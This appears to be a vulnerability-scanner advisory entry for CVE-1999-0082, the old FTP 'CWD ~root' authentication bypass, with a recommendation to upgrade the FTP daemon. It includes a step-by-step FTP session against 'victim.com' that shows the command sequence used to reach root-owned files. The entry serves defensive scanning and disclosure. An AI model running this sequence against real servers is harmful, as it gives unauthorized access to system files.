| VID |
16037 |
| Severity |
40 |
| Port |
21 |
| Protocol |
TCP |
| Class |
FTP |
| Detailed Description |
CWD ~root command in the FTP server allows root access. Very old versions of the FTP daemon may allow remote users to unauthorized access by using of the "CWD ~root" command. By issuing a sequence of commands including the "CWD ~root" command, an attacker could bypass authentication on a vulnerable FTP server to gain root permissions and and access arbitrary files outside of the FTP root directory with root privilege.
While looking at ftp, you can check for an older bug that was once widely exploited:
% ftp -n
ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp@
230 Guest login ok, access restrictions apply.
ftp> ls -al / (or whatever)
* Platforms Affected:
FTP Any version
* References:
http://www.iss.net/security_center/static/54.php
http://www.alw.nih.gov/Security/Docs/admin-guide-to-cracking.101.html |
| Recommendation |
Replace the vulnerable FTP daemon with a more recent FTP package.
Also, FTP daemons that are vulnerable to this attack are likely to have shipped with older operating systems. Consider upgrading to the latest available operating system supported by your hardware. |
| Related URL |
CVE-1999-0082 (CVE) |
| Related URL |
(SecurityFocus) |
| Related URL |
(ISS) |
|
